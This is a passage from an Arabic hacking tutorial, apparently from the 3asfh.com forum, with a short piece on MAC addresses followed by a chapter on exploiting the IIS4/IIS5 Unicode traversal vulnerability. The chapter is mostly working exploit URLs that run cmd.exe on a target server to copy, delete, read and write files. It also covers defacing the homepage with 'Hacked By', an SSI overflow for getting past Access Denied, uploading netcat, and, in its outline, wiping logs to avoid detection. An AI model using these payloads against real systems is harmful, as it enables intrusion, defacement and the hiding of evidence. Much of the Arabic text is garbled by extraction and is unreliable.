‫ﺘﻐﯿ ﺮ وﺑﻬﺬا ﯾﻤﻜﻨﻨﺎان ﻧﻘﻮ ل و ﻧﻮ ﺿﺢﻟﻜﻢ‬ ‫ﺘﻘﺪاﻧﻜﻢﺗﻼ ﺣﻈﻮناﻧﻪﺛﺎﺑ ﺖ ﻻ ﯾ‬ ‫ﻮ ﺎ ل ‪Physical Address‬ﺎﻋ‬
‫ﺘﺼ ﻞﺑﻪ‬‫ﻗﻢاﻟﺠﻬﺎز ﻧﻔﺴﻪاﻟﺬىﺗ‬ ‫انا ل ‪Physical Address‬ﻫﺬا ﻫﻮا ل ‪ Mac Address‬ﺎى ر‬
‫ﺛﻨﺎ ءاﻟﻌﻤ ﻞ وﻟﺬﻟﻚﻓﻘﺪﻗﻠ ﺖﻓﻰﻛﻼﻣﻰانﺗ ﺤﺪﯾﺪا ل ‪ Physical Address‬ﻣﻬﻢ ﺟﺪاااﻓﻰ‬ ‫ﺘﻮرﻛ ﺲا‬ ‫اﻟﻨ‬
‫ﺘﻌ ﺮ فاﻟﺒﺎﻛﯿﺪﺟ ﺲ‬‫ﺘ‬
‫ﻋﻤﻠﯿﻪ ﻧﻘ ﻞ ﻣﻌﻠﻮﻣﺎ تاوﺑﯿﺎﻧﺎ تا ل ‪ ip‬ﻻﻧﻪﺑﺪون ‪ Physical Address‬ﺎذنﻓﻜﯿ ﻒ ﺳ‬
‫اﻟﻤﻮﺟﻮدهﻓﻰا ل ‪router‬ﻋﻠﻰ ﻃ ﺮﯾﻘﻬﺎ‪.‬‬
‫ﺘﺎر تﻟﻜ ﻞ ﻣ ﺮهﻓﻰ‬‫ﺘﻐﯿﯿ ﺮ ﻋﻨﺪ ﻋﻤ ﻞ رﯾﺴ‬ ‫ﺘﻮب ‪ dynamic‬ﺎىاﻧﻪ ﻏﯿ ﺮﺛﺎﺑ ﺖﺑﻤﻌﻨﻰاﻧﻪ ﯾ‬ ‫ﻮا ل ‪type‬ﻫﺬا ﻣﻜ‬
‫ﺘ ﺮﻧ ﺖ ‪.‬‬
‫اﻟﺠﻬﺎز ﻮﻟﻜﻨﻪ ﯾﺜﺒ ﺖاﺛﻨﺎ ءاﻟﻌﻤ ﻞ ﻋﻠﻰاﻻﻧ‬
‫ﺘﻮ ﺿﯿﺢ"‬ ‫ﺘﻐﯿ ﺮ "ﻫﺬاﻓﻘﻂﻟﻠ‬ ‫ﻮ ﻫﻨﺎكاﻟﻨﻮ عاﻻ ﺧ ﺮ وﻫﻮا ل ‪static‬ﺎى ﺎﻟﺜﺎﺑ ﺖاﻟﺬى ﻻ ﯾ‬

‫ﺘﻘﺪاﻻناﻧﻨﺎﻓﻬﻤﻨﺎﺑﻤﻌﻨﻰﺑﺴﯿﻂ ﻣﺎ ﻫﻮاﻟ ﺮوﺗﻨ ﺞ و ﻣﺎﻫﻰا ل‪routers‬‬


‫ﺎﻋ‬
‫‪...‬‬

‫‪٩١‬‬
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

‫اﻟﻔ ﺼ ﻞ اﻟﺜﺎﻟﺚ‬
<><><><><><><><><><><><><><><><><><><><><><><><><><><><>

‫ﻘﺘﻄﻔﺎ ت ﻋﻦ‬ ‫))ﻣ‬


((‫اﻟﺴﯿﺮﻓﺮا توا ﻷﻧﻈﻤﺔ‬

٩٢
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫" اﻹﺧﱰاق ﻋﻦ ﻃﺮﯾﻖ اﻟﯿﻮﻧﯿﻜﻮد )اﳉﺰء اﻷول( "‬

‫‪$$$$$$$$$$$$$$$‬‬
‫اﻟﻜﺎﺗﺐ‪sNiper_hEx:‬‬
‫‪$$$$$$$$$$$$$$$‬‬

‫ﺘﻮىاﻟﺪرساﻻو ل ﻋﻠﻰ ) ‪ ١٣‬ﻧﻘﻄﺔ ( وﻫﻲﻛﻤﺎ ﯾﻠﻲ ‪-:‬‬ ‫ﯾﺤ‬


‫‪ -‬ﺗﻌ ﺮﯾ ﻒﺑﺎﻟﯿﻮﻧﯿﻜﻮد ‪.‬‬
‫‪ -‬ﺗﺎرﯾ ﺦ ﻇﻬﻮر ﻫﺬهاﻟﺜﻐ ﺮة ‪.‬‬
‫‪ -‬ﻛﯿﻔﯿﺔاﯾﺠﺎدﻫﺬهاﻟﺜﻐ ﺮا ت ‪.‬‬
‫ﺘﻐﻼ لﺛﻐ ﺮا تاﻟﯿﻮﻧﻜﻮد ‪.‬‬ ‫ﺘﻢاﺳ‬ ‫‪ -‬ﻛﯿ ﻒ ﯾ‬
‫ﺘﺨﺪﻣﺔﺑﻮاﺳﻄﺔ ﻣﻠ ﻒ ‪. CMD‬‬ ‫‪ -‬ﺎﻻواﻣ ﺮاﻟﻤﺴ‬
‫‪ -‬ﻃ ﺮﯾﻘﺔﺗﻄﺒﯿ ﻖ ﻫﺬهاﻟﺜﻐ ﺮا ت ‪.‬‬
‫ـ ‪. ECHO‬‬ ‫ﺘﻤﻜﻦ ﻣﻦﺗﻔﻌﯿ ﻞاﻣ ﺮاﻟ‬ ‫ﺘﻰﺗ‬ ‫ﺘﺼﺎرﺛﻐ ﺮةاﻟﯿﻮﻧﯿﻜﻮد ﺣ‬ ‫‪ -‬ﻛﯿﻔﯿﺔا ﺧ‬
‫ﺘﺎﺑﺔ ﻋﻠﻰاﻟﻤﻠﻔﺎ ت ‪.‬‬ ‫ـ ‪ CMD‬ﻻﺗﺎ ﺣﺔاﻣﻜﺎﻧﯿﺔاﻟﻜ‬ ‫‪ -‬ﻃ ﺮﯾﻘﺔ ﻧﺴ ﺦ ﻣﻠ ﻒاﻟ‬
‫ﺘﺒﻌﺔﻟﻬﺎ ‪.‬‬ ‫ـ ‪ Access Denied‬واﻟ ﺤﻠﻮ لاﻟﻤ‬ ‫‪ -‬ﻛﯿﻔﯿﺔ ﻣﻌ ﺮﻓﺔ ﻣﺸﻜﻠﺔاﻟ‬
‫ـ ‪. FTP‬‬ ‫‪ -‬ﻛﯿﻔﯿﺔ ﻋﻤ ﻞاﻛﺎوﻧ ﺖﻟﻠﺪ ﺧﻮ لﺑﻮاﺳﻄﺔاﻟ‬
‫ﺘﻮر ‪.‬‬ ‫‪ -‬ﻃ ﺮﯾﻘﺔﻛﺸ ﻒﺑﺎﺳﻮرداﻻدﻣﯿﻨﺴ‬
‫ﺘ ﺮﯾ‬
‫ﻗﻊ وﻋﻤﻠﯿﺔاﻻبﻟﻮودﺑﻮاﺳﻄﺔﺑ ﺮﻧﺎﻣ ﺞ ‪. TFTP‬‬ ‫‪ -‬ﺗﻐﯿﯿ ﺮاﻟﺼﻔ ﺤﺔاﻟ ﺮﺋﯿﺴﯿﺔﻟﻠﻤﻮ‬
‫ﺘﻌ ﺮ ف ﻋﻠﯿﻚ ‪.‬‬‫ﺘﻢاﻟ‬‫ﺘﻰ ﻻ ﯾ‬ ‫‪ -‬ﻣﺴﺢ ﻣﻠﻔﺎ تاﻟﻠﻮ ق ﺣ‬

‫‪٩٣‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫‪ -‬ﺗﻌ ﺮﯾ ﻒﺑﺎﻟﯿﻮﻧﯿﻜﻮد ‪.‬‬


‫ﺘﻲ رﻛﺒ ﺖ ﻣﻊ ‪IIS4.0 /‬‬
‫اﻟﯿﻮﻧﯿﻜﻮد ﻋﺒﺎرة ﻋﻦ ﻣﺠﻤﻮﻋﺔ ﻣﻦاﻟﺜﻐ ﺮا تﻓﻲ ﻣﺠﻤﻮﻋﺔ ﺧﺪﻣﺔاﻟﻤﻌﻠﻮﻣﺎ تاﻟ‬
‫‪ IIS5.0‬واﻟﺬي ﯾﺎﺗﻲ ﻋﺎدة ﻣﻊ ‪. NT4 / Win2k‬‬

‫‪ -‬ﺗﺎرﯾ ﺦ ﻇﻬﻮر ﻫﺬهاﻟﺜﻐ ﺮة ‪.‬‬


‫ﺘﺒ ﺮ ﻇﻬﻮرﻫﺎﺑﻮاﺳﻄﺔ ﺷﺨ ﺺ ﻣﺠﻬﻮ ل‬ ‫ﻻﯾﻮﺟﺪﺗﺎرﯾ ﺦ ﻣ ﺤﺪدﻟﻈﻬﻮراو لﺛﻐ ﺮةﻟﻠﯿﻮﻧﯿﻜﻮدﻟﺬا ﯾﻌ‬
‫ﻗﯿ ﻞاناو ل ﻇﻬﻮرﻟﺜﻐ ﺮا تاﻟﯿﻮﻧﯿﻜﻮدﻛﺎﻧ ﺖﺑﻮاﺳﻄﺔاﻟﺼﯿﻨﯿﻦ وﻟﻜﻦ ﻻﯾﻮﺟﺪ‬ ‫‪ ، anonymous person‬و‬
‫ﻗﯿﻦ وﺗﻄﻮﯾ ﺮاﻟﺒ ﺮاﻣ ﺞ‬
‫ﺘﺮ‬‫ﺘﻐﻼ ل ﻫﺬهاﻟﺜﻐ ﺮا ت ﻣﻦﻗﺒ ﻞاﻟﻤﺨ‬ ‫ﺘﻢاﺳ‬‫ﻣﺎﯾﺜﺒ ﺖ ﺻ ﺤﺔﻫﺬااﻟﻜﻼم ﻟﻬﺬهاﻟﺜﻐ ﺮا ت ‪،‬ﻓ‬
‫اﻟﻼزﻣﺔﻟﻬﺎ ‪.‬‬

‫‪ -‬ﻛﯿﻔﯿﺔاﯾﺠﺎدﻫﺬهاﻟﺜﻐ ﺮا ت ‪.‬‬
‫ﺘﯿﻦ ‪-:‬‬ ‫ﺘﻢاﯾﺠﺎد ﻫﺬهاﻟﺜﻐ ﺮا تﺑﻄ ﺮﯾﻘ‬
‫ﯾ‬
‫ﺘﻲﺗﻌﻤ ﻞ ﻋﻠﻰ‬
‫‪ -١‬ﺑﻮاﺳﻄﺔاﻟﺒ ﺮاﻣ ﺞاﻟﻼزﻣﺔ واﻟﻤﺨﺼﺼﺔﻟﻜﺸ ﻒﻫﺬهاﻟﺜﻐ ﺮا ت ﺳﻮا ءﺑﺎﻟﺒ ﺮاﻣ ﺞاﻟ‬
‫ﺘﻲﺗﻌﻤ ﻞ ﻋﻠﻰ ﻧﻈﺎمﻟﯿﻨﻜ ﺲ ‪.‬‬ ‫ﻧﻈﺎم وﯾﻨﺪوزاوﺑﻄ ﺮﯾﻘﺔاﻟﺸ ﻞ واﻟ‬
‫ﻗﻊ ﻣﺒﺎﺷ ﺮة ‪.‬‬‫‪ -٢‬ﺑﻮاﺳﻄﺔﺗﻄﺒﯿ ﻖاﻟﺜﻐ ﺮة ﻋﻠﻰاﻟﻤﻮ‬

‫ﺘﻐﻼ لﺛﻐ ﺮا تاﻟﯿﻮﻧﻜﻮد ‪.‬‬


‫ﺘﻢاﺳ‬ ‫‪ -‬ﻛﯿ ﻒ ﯾ‬
‫ـ ‪ IIS4 / IIS5‬ﯾﺒﺪا ﻣﻠ ﻒ ‪CMD‬ﺑﻔﻚ ﺷﻔ ﺮةاﻟﯿﻮﻧﻜﻮدﻓﻲاﻟﻤﺜﺎ لاﻟﺨﻄﺎ ء‬‫ﻋﻨﺪﺗﻄﺒﯿ ﻖاﻟﺜﻐ ﺮة ﻋﻠﻰ ﻧﻈﺎماﻟ‬
‫ﺘﻐﻼﻟﻬﺎ ‪.‬‬
‫ﺘﻢاﺳ‬ ‫وﻣﻦﻫﻨﺎ ﯾ‬

‫ﺘﺨﺪﻣﺔﺑﻮاﺳﻄﺔ ﻣﻠ ﻒ ‪. CMD‬‬ ‫‪ -‬ﺎﻻواﻣ ﺮاﻟﻤﺴ‬


‫ـ ‪ CMD‬وﻫﻲاﻣ ﺮ ﻻﻧﺸﺎ ء دﻟﯿ ﻞ ﺟﺪﯾﺪ واﻣ ﺮ ﻻﻟﻐﺎ ء دﻟﯿ ﻞ واﻣ ﺮاﻟﻨﺴ ﺦ‬ ‫ﺘﺨﺪﻣﻪﺑﻮاﺳﻄﺔ ﻣﻠ ﻒاﻟ‬ ‫ﺎﻻواﻣ ﺮاﻟﻤﺴ‬
‫ﺘﺎﺑﺔ دا ﺧ ﻞأي‬
‫ﺘﻮﯾﺎ تاﻟﻤﻠ ﻒ واﻣ ﺮاﻟﻜ‬ ‫واﻣ ﺮاﻟﻨﻘ ﻞ واﻣ ﺮاﻟ ﺤﺬ ف واﻣ ﺮﺗﻐﯿﯿ ﺮاﺳﻤﺎ ءاﻟﻤﻠﻔﺎ ت واﻣ ﺮﻟ ﺮؤﯾﺔ ﻣ ﺤ‬
‫ﺘﺎﻟﯿﺔ ‪-:‬‬
‫ﻣﻠ ﻒ واﻣ ﺮﻟﺴ ﺤﺐأي ﻣﻠ ﻒ ‪ ،‬وﻫﻲ ﺣﺴﺐاﻻﻣﺜﻠﺔاﻟ‬
‫‪:‬اﻣ ﺮاﻧﺸﺎ ء دﻟﯿ ﻞ ﺟﺪﯾﺪ‬
‫‪http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.‬‬
‫‪exe?/c+md+c:\hEx‬‬

‫‪:‬ﺎﻣ ﺮاﻟﻐﺎ ء دﻟﯿ ﻞ‬


‫‪http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.‬‬
‫‪exe?/c+rd+c:\hEx‬‬
‫ًﺗﻤﺎم ﻣﻦاﻟﻤﻠﻔﺎ ت واﻟﻤﺠﻠﺪا ت‬
‫ﻟﻠﻤﻌﻠﻮﻣﯿﺔ‪:‬ﻻﯾﻤﻜﻦاﻟﻐﺎ ءأي دﻟﯿ ﻞاﻻاذاﻛﺎنﻓﺎرﻏﺎ‬

‫ﺘﺨﺪمﻟﻠﻨﺴ ﺦ‬
‫‪:‬ﺎﻻﻣ ﺮاﻟﻤﺴ‬
‫‪http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.‬‬
‫‪exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\hEx.exe‬‬

‫ﺘﺨﺪمﻟﻠﻨﻘ ﻞ‬
‫‪:‬ﺎﻻﻣ ﺮاﻟﻤﺴ‬
‫‪http://www.xxxx.com/msadc/..%c0%af../winnt/system32/cmd.exe?/c+m‬‬
‫\‪ove+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\hEx.exe+c:‬‬

‫‪٩٤‬‬
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

‫ﺘﺨﺪمﻟﻠ ﺤﺬ ف‬
‫ﺎﻻﻣ ﺮاﻟﻤﺴ‬:
http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.
exe?/c+del+c:\hEx.mdb

‫ﺘﻐﯿﯿ ﺮ ﻣﺴﻤﻰاﻟﻤﻠﻔﺎ ت‬
‫ﺘﺨﺪمﻟ‬
‫ﺎﻻﻣ ﺮاﻟﻤﺴ‬:
http://www.xxxx.com/msadc/..%c0%af../winnt/system32/cmd.exe?/c+re
n+c:\index.htm+hEx.htm

‫ﺘﻮﯾﺎ تاﻟﻤﻠ ﻒ‬
‫ﺘﺨﺪمﻟ ﺮؤﯾﺔ ﻣ ﺤ‬
‫ﺎﻻﻣ ﺮاﻟﻤﺴ‬:
http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.
exe?/c+type+c:\hEx.txt

‫ﺘﺎﺑﺔ دا ﺧ ﻞأي ﻣﻠ ﻒ‬
‫ﺘﺨﺪمﻟﻠﻜ‬
‫ﺎﻻﻣ ﺮاﻟﻤﺴ‬:
http://www.xxxx.com/msadc/..%c0%af../winnt/system32/cmd.exe?/c+ec
ho+sNiper_hEx+>c:\hEx.txt

‫ﺘﺨﺪمﻟﻌﻤﻠﯿﺔ ﺳ ﺤﺐأي ﻣﻠ ﻒ‬ ‫ﺎﻻﻣ ﺮاﻟﻤﺴ‬:


‫ﺘﺎﻟﻲ‬
‫ﺘﺎﺑﺔاﺳﻢاﻟﻤﻠ ﻒﻓﻲا ﺧ ﺮاﻟﻌﻨﻮانﻛﺎﻟ‬
‫ﺘﻢﻛ‬
‫ًﺑﻨﺴ ﺦاﻟﻤﻠ ﻒاﻟﻤ ﺮاد ﺳ ﺤﺒﻪاﻟﻰأي دﻟﯿ ﻞ وﺑﻌﺪﻫﺎ ﯾ‬
‫ﻋﻠﯿﻚاﻟﻘﯿﺎماوﻻ‬
:
http://www.xxxx.com/msadc/hEx.mdb

. ‫ ﻃ ﺮﯾﻘﺔﺗﻄﺒﯿ ﻖ ﻫﺬهاﻟﺜﻐ ﺮا ت‬-


-: ‫ﺘﺎﻟﯿﺔ‬
‫ﺘﻢ ﺣﺴﺐاﻻﻣﺜﻠﺔاﻟ‬
‫ﺘﺼﻔﺢﺗ‬ ‫ﻗﻊ ﻣﻦ ﺧﻼ لاﻟﻤ‬ ‫ﺗﻄﺒﯿ ﻖاﻟﺜﻐ ﺮة ﻋﻠﻰاﻟﻤﻮ‬
http://www.xxxx.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+di
r+c:\
http://www.xxxx.com/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+di
r+c:\
http://www.xxxx.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
+c:\
http://www.xxxx.com/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir
+c:\
http://www.xxxx.com/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+di
r+c:\
http://www.xxxx.com/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+di
r+c:\
http://www.xxxx.com/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+di
r +c:\
-: ‫ﺘﺎجاﻟﻰﺗﻐﯿﯿ ﺮ ﻣﺴﻤﻰاﻟﺪﻟﯿ ﻞﺑ ﺤﯿﺚ ﯾﻜﻮن‬ ‫ﻗﺪ ﻧ ﺤ‬
‫و‬
Msadc , _vti_bin , iisadmpwd , _vit_admin , scripts , samples , cgi-bin

٩٥
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ـ ‪. ECHO‬‬ ‫ﺘﻤﻜﻦ ﻣﻦﺗﻔﻌﯿ ﻞاﻣ ﺮاﻟ‬ ‫ﺘﻰﺗ‬ ‫ﺘﺼﺎرﺛﻐ ﺮةاﻟﯿﻮﻧﯿﻜﻮد ﺣ‬ ‫‪ -‬ﻛﯿﻔﯿﺔا ﺧ‬


‫ﺘ ﺮ ضاﻧﻪﻛﺎن ﻋﻠﻰﻫﺬهاﻟﺜﻐ ﺮة ‪-:‬‬‫ﻗﻊ ﯾﻌﺎﻧﻲ ﻣﻦ ﻣﺸﻜﻠﺔاﻟﯿﻮﻧﯿﻜﻮد وﻟﻨﻔ‬ ‫ﺘﺸﺎ ف ﻣﻮ‬ ‫ﻓﻲ ﺣﺎﻟﺔاﻛ‬
‫‪http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/c‬‬
‫\‪md.exe?/c+dir+c:‬‬

‫ﺘﺎجاﻟﻰ ﻧﺴ ﺦ ﻣﻠ ﻒ ‪w3svc.exe‬اﻟﻰ ﻣﺠﻠﺪ ‪ inetpub\scripts‬واﻻﻣ ﺮ ﯾﻜﻮنﺑﻬﺬهاﻟﻄ ﺮﯾﻘﺔ ‪-:‬‬


‫ﻓﻨ ﺤ‬
‫‪http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/c‬‬
‫‪md.exe?c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\w3sv‬‬
‫‪c.exe‬‬

‫ﻗﻊ ﻣﻦ ﺧﻼ ل‬ ‫ﺘﺼﻔﺢاﻟﻤﻮ‬ ‫ﺑﻌﺪ ﻧﺴ ﺦ ﻣﻠ ﻒ ‪w3svc.exe‬اﻟﻰ ﻣﺠﻠﺪ ‪، inetpub\scripts‬اﻻن ﻧﻘﻮمﺑ‬


‫اﻟﺜﻐ ﺮةﺑﻬﺬهاﻟﻄ ﺮﯾﻘﺔ ‪-:‬‬
‫\‪http://www.xxxx.com/scripts/w3svc.exe?/c+dir+c:‬‬
‫ﻗﻊاﻟﺬي ﻏﺎﻟﺒﺎ ﻣﺎﯾﻜﻮنﻓﻲ ﻫﺬااﻟﺪﻟﯿ ﻞ‬ ‫ﺘ ﺤﺪﯾﺪاﻟﻤﻠ ﻒاﻟ ﺮﺋﯿﺴﻲﻟﻠﻤﻮ‬
‫ﺘﺎﺑﺔ دا ﺧ ﻞأي ﻣﻠ ﻒ وﺑﺎﻟ‬
‫ﺘﻄﯿﻊاﻟﻜ‬‫اﻻن ﻧﺴ‬
‫ﺘﺎﻟﻲ ‪-:‬‬
‫‪inetpub\wwwroot\index.htm‬ﺑ ﺤﯿﺚ ﯾﻜﻮناﻻﻣ ﺮﺑﺎﻟﺸﻜ ﻞاﻟ‬
‫‪http://www.xxxx.com/scripts/w3svc.exe?/c+echo+Hacked+By+sNipe‬‬
‫‪r_hEx+hExRay@Hotmail.com+>+c:\inetpub\wwwroot\index.htm‬‬

‫ﺘﺎﺑﺔ ﻋﻠﻰاﻟﻤﻠﻔﺎ ت ‪.‬‬‫‪ -‬ﻃ ﺮﯾﻘﺔ ﻧﺴ ﺦ ﻣﻠ ﻒا ‪ CMD‬ﻻﺗﺎ ﺣﺔاﻣﻜﺎﻧﯿﺔاﻟﻜ‬


‫ﺘﻢ‬‫ﺘﺎﺑﺔ دا ﺧ ﻞاﻟﺴﯿ ﺮﻓ ﺮﻓﻲﺑﻌ ﺾاﻟ ﺤﺎﻻ ت وﯾ‬
‫ـ‪ CMD‬وﻫﻮ ﻻﻋﻄﺎ ءاﻣﻜﺎﻧﯿﺔﻟﻠﻜ‬ ‫ﺎﻟﻐ ﺮ ض ﻣﻦ ﻧﺴ ﺦ ﻣﻠ ﻒاﻟ‬
‫ﻧﺴﺨﻪاﻟﻰ ﻣﺠﻠﺪاﻟﺴﯿﻜ ﺮﺑ ﺖﺑﻬﺬهاﻟﻄ ﺮﯾﻘﺔ ‪-:‬‬
‫‪http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/c‬‬
‫‪md.exe?c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\cmd‬‬
‫‪1.exe‬‬
‫ـ‪CMD‬اﻟﺠﺪﯾﺪﻓﻲاﻟﺜﻐ ﺮةﺑﺪﻻ ﻣﻦاﻻو لﺑﻬﺬااﻟﺸﻜ ﻞ ‪-:‬‬ ‫ﺘﺨﺪام ﻣﻠ ﻒاﻟ‬‫اﻻنﺑﺎﻣﻜﺎﻧﻨﺎاﺳ‬
‫‪http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/c‬‬
‫\‪md1.exe?c+dir+c:‬‬

‫ﺘﺒﻌﺔﻟﻬﺎ ‪.‬‬
‫ـ ‪ Access Denied‬واﻟ ﺤﻠﻮ لاﻟﻤ‬ ‫‪-‬ﻛﯿﻔﯿﺔ ﻣﻌ ﺮﻓﺔ ﻣﺸﻜﻠﺔاﻟ‬
‫ﺘﺪاد ‪،‬ﻓﻌﻨﺪ‬ ‫ـ ‪ Access Denied‬ﻣﻦ ﺧﻼ لاﻟﻤ ﺤﺎوﻟﺔﻓﻲ ﺣﺬ فأي ﻣﻠ ﻒ ﻣﻦأياﻣ‬ ‫ﺘﻢ ﻣﻌ ﺮﻓﺔ ﻣﺸﻜﻠﺔاﻟ‬ ‫ﺗ‬
‫ﺘ ﺤﻜﻢ‬‫ﺘﺎﺑﺔ ﻋﻠﻰاﻟﻤﻠﻔﺎ ت واﻟ‬
‫ﺘﻤﻜﻦ ﻣﻦاﻟﻜ‬ ‫ﺘﻰﺗ‬‫ـ ‪Access Denied‬ﻓﺎﻟﯿﻚ ﻫﺬهاﻟﻄ ﺮ ق ﺣ‬ ‫ﻇﻬﻮر رﺳﺎﻟﺔاﻟ‬
‫اﻛﺜ ﺮ ﻋﻠﻰاﻟﺴﯿ ﺮﻓ ﺮ ‪-:‬‬
‫ﺘﺎ حﻟﻚاﻣﻜﺎﻧﯿﺔ‬ ‫ـ ‪CMD‬اﻟﻰ دﻟﯿ ﻞاﻟﺴﯿﻜ ﺮﺑ ﺖﺑﻤﺴﻤﻰ ‪CMD1‬ﻓﺴﻮ ف ﯾ‬ ‫‪ -١‬ﺎﻟﻄ ﺮﯾﻘﺔاﻻوﻟﻰ ﻧﺴ ﺦ ﻣﻠ ﻒاﻟ‬
‫ﺘﺨﺪام ﻫﺬااﻻﻣ ﺮ ‪-:‬‬
‫ﺘﺨﺪاماﻻﻣ ﺮ ‪Copy‬ﺑﺎﺳ‬ ‫ﺘﺎﺑﺔﺑﺎﺳ‬‫اﻟﻜ‬
‫‪http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/c‬‬
‫‪md.exe?c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\cmd‬‬
‫‪1.exe‬‬
‫ﺘﻌﺎﻣ ﻞ ﻣﻊاﻟﻤﻠ ﻒ ‪ ssinc.dll‬واﻟﻄ ﺮﯾﻘﺔﻛﻤﺎ ﯾﻠﻲ ‪-:‬‬‫‪ -٢‬ﺎﻟﻄ ﺮﯾﻘﺔاﻟﺜﺎﻧﯿﺔﺑﺎﻟ‬
‫‪ o‬ﺎوﻻاﻧﺸﺎ ء ﺻﻔ ﺤﺔﺑﺎﺳﻢ ‪test.shtml‬‬

‫‪٩٦‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫‪ o‬ﺗﻜﻮن ﻫﺬهاﻟﺼﻔ ﺤﺔ دا ﺧ ﻞ ﻣﺠﻠﺪ ‪wwwroot/hEx/test.shtml‬‬


‫ﺘﺎﺑﺔ ﻫﺬااﻟﻜﻮد دا ﺧ ﻞاﻟﺼﻔ ﺤﺔ >!‪<--"include file="AAAA[...]AA#--‬ﺑ ﺤﯿﺚان‬ ‫‪o‬ﻛ‬
‫ﺘﻌﺪى ‪ ٢٠٤٩‬ﺣ ﺮ ف ‪.‬‬ ‫ﺘﻰ ﯾ‬ ‫ﺘﺔ ﺣ‬ ‫ﺘﺎﺑ‬‫ﺘﻢﻛ‬‫ﺣ ﺮ ف ‪A‬ﯾ‬
‫ﺘﺼﻔﺢ ‪http://www.xxxx.com/test.shtml‬‬ ‫ﺘﻢ ﻃﻠﺐاﻟﺼﻔ ﺤﺔ ﻣﻦ ﺧﻼ لاﻟﻤ‬ ‫‪ o‬ﺎﻻن ﯾ‬
‫‪ o‬ﺎﻻن ﺳﻮ فﺗﻈﻬ ﺮﻟﻚاﻟﺼﻔ ﺤﺔ ‪.‬‬
‫ـ‪. Access Denied‬‬ ‫ﺘﺎﺑﻪ وﺗﻢﺗﺨﻄﻲ ﻣﺸﻜﻠﺔاﻟ‬ ‫ﺘﻄﯿﻊاﻟﻜ‬
‫‪ o‬ﺎﻻنﺗﺴ‬
‫ﺘﻄﺒﯿ ﻖاﻟﻄ ﺮﯾﻘﺔﺑﺎﻟﺸﻜ ﻞاﻟﺼ ﺤﯿﺢ‬ ‫ﻗﻢ ‪٥٠٠‬ﻓﻤﻌﻨﺎﻫﺎاﻧﻚﻟﻢﺗﻘﻢﺑ‬ ‫‪ o‬ﺎذا ﻇﻬ ﺮ تﻟﻚ ﺻﻔ ﺤﺔاﻟﺨﻄﺎ ء ر‬
‫وﻋﻠﯿﻚاﻋﺎدةاﻟﻤ ﺤﺎوﻟﺔ ‪.‬‬
‫ـ‬
‫ﺘﻢ ﻋﻤ ﻞابﻟﻮودﻟﻬﺬااﻟﻤﻠ ﻒ دا ﺧ ﻞ ﻣﺠﻠﺪاﻟ‬ ‫ﺘﺨﺪامﺑ ﺮﻧﺎﻣ ﺞ ‪NC.exe‬ﺑ ﺤﯿﺚ ﯾ‬ ‫‪ -٣‬ﺎﻟﻄ ﺮﯾﻘﺔاﻟﺜﺎﻟﺜﺔﺑﺎﺳ‬
‫ـ‬‫ﺘﻢﺗﻨﻔﯿﺬاﻻواﻣ ﺮ ﻣﻦ ﺧﻼ ل ﻣﻮﺟﺔاﻟﺪوز وﻟﻠﻤﻌﻠﻮﻣﯿﺔ ﻣﺠﻠﺪاﻟ‬ ‫‪Temp‬ﻓﻲ دﻟﯿ ﻞاﻟﻮﯾﻨﺪوز وﻣﻨﻪ ﯾ‬
‫ﺘﻮ حﻟﻌﻤﻠﯿﺎ تاﻻبﻟﻮود ‪.‬‬ ‫‪ Temp‬ﻣﻔ‬
‫ﺘﺨﺪاماﻟﺒ ﺮاﻣ ﺞاﻟﻼزﻣﺔﻟﻬﺬااﻟﻐ ﺮ ض وﻫﺬه‬ ‫‪ -٤‬اﻟﻄ ﺮﯾﻘﺔاﻟ ﺮاﺑﻌﺔ وﻫﻲ ﻣﻦ ﺧﻼ ل ﻋﻤ ﻞﻛ ﺮا شﻟﻠﺴﯿ ﺮﻓ ﺮﺑﺎﺳ‬
‫اﻟﻄ ﺮﯾﻘﺔ ﻏﯿ ﺮ ﻣﺠﺪﯾﻪﻓﻲﻛﺜﯿ ﺮ ﻣﻦاﻻ ﺣﯿﺎن ‪.‬‬
‫‪ -٥‬ﺎﻟﺒ ﺤﺚ ﻋﻦ ﻣﻠﻔﺎ ت ‪w3svc.exe ، shell.exe ، sensepost.exe ، root.exe :‬‬
‫وﻧﺴﺨﻬﺎاﻟﻰ ﻣﺠﻠﺪ ‪ c:\inetpub\scripts‬وﺗﻄﺒﯿ ﻖاﻟﺜﻐ ﺮة ﻣﻦ ﺧﻼﻟﻬﺎ ‪.‬‬

